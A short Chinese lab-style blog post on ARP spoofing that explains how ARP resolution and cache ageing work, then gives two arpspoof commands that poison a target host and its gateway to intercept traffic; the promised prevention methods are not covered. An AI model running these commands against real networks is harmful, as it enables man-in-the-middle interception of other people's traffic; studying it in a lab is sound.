标签:arp欺骗
【实验目的】:
了解ARP欺骗原理,掌握ARP欺骗的方法及预防ARP攻击的方法。
【ARP协议原理】:
我们以主机A向主机B发送数据为例。当发送数据时,主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了,也就知道了目标MAC地址,直接把目标MAC地址写入帧里面发送就可以了;如果在ARP缓存表中没有找到相对应的IP地址,主机A就会在网络上发送一个广播,目标MAC地址是“FF.FF.FF.FF.FF.FF”,这表示向同一网段内的所有主机发出这样的询问:“主机B的MAC地址是什么?”网络上其他主机并不响应ARP询问,只有主机B接收到这个帧时,才向主机A做出这样的回应:“主机B的MAC地址是00-aa-00-62-c6-09”。这样,主机A就知道了主机B的MAC地址,它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表,下次再向主机B发送信息时,直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制,在一段时间内如果表中的某一行没有使用,就会被删除,这样可以大大减少ARP缓存表的长度,加快查询速度。
欺骗:arpspoof -i eth0 -t 172.28.15.53 172.28.15.254
监控:arpspoof -i eth0 -t 172.28.15.254 172.28.15.53
arpspoof -i 列出网卡数,记下序号
本文出自 “12035289” 博客,谢绝转载!
标签:arp欺骗
原文地址:http://12045289.blog.51cto.com/12035289/1855013
